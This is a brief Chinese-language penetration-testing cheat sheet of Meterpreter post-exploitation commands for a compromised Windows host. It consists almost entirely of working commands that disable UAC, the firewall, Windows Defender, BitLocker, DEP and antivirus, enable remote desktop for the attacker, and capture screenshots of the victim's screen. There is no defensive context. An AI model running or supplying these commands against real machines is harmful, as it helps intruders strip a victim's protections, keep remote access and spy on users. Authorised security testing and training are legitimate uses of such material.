关闭防护机制、远程桌面、截图

关闭UAC

meterpreter > shell

C:\Windows\system32>cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\system32>cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

C:\Windows\system32>shutdown /r /t 0  有时可能需要重启才能生效

C:\Windows\system32>netsh advfirewall set allprofiles state off  关闭防火墙

C:\Windows\system32>net stop windefend  关闭Windows Defender服务

C:\Windows\system32>manage-bde -status C:  查看C盘Bitlocker状态

C:\Windows\system32>manage-bde -off C:  关闭Bitlocker磁盘加密

C:\Windows\system32>bcdedit.exe /set {current} nx AlwaysOff  关闭DEP

meterpreter > run post/windows/manage/killav  关闭杀毒软件

远程桌面

meterpreter > run post/windows/manage/enable_rdp  开启远程桌面

root@kali:~# rdesktop 192.168.80.33  在Kali上连接目标主机

meterpreter > run multi_console_command -r /root/.msf4/loot/20170407110920_default_192.168.80.33_host.windows.cle_874214.txt  关闭远程桌面

meterpreter > screenshot  截图目标主机

meterpreter > load espia

meterpreter > screengrab  截图目标主机